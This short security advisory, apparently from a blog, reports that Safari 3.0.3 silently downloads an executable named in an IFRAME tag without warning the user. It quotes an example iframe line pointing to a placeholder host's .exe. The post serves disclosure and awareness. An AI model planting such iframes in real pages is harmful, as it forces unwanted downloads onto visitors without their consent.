A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.

True enough, we have found that the Safari version 3.0.3(522.15.5) Web browser for the Windows OS automatically downloads a file referred to in an IFRAME tag used on a certain site, for example,

iframe src=”http://www.XXXX.com/XXXX.exe” mce_src=”http://www.XXXX.com/XXXX.exe” name=”iframe” id=”iframe”

Unlike IE and Firefox, which displays an alert message like the one below whenever a file is about to be downloaded onto the system, this Safari version does not display any sort of notification.

A behind the scenes look using the Ethereal Network Analyzer further reveals that the system is indeed being commanded to download a file.

The flaw has potential for misuse and may become a possible source of violations of user rights against entities downloading files on a system without user consent. As of this writing, this bug has also been found to work on iPhone 1.0.2.

Additional information provided by Leander Yu.

If you're new here, you may want to subscribe to our RSS feed. Thanks for visiting!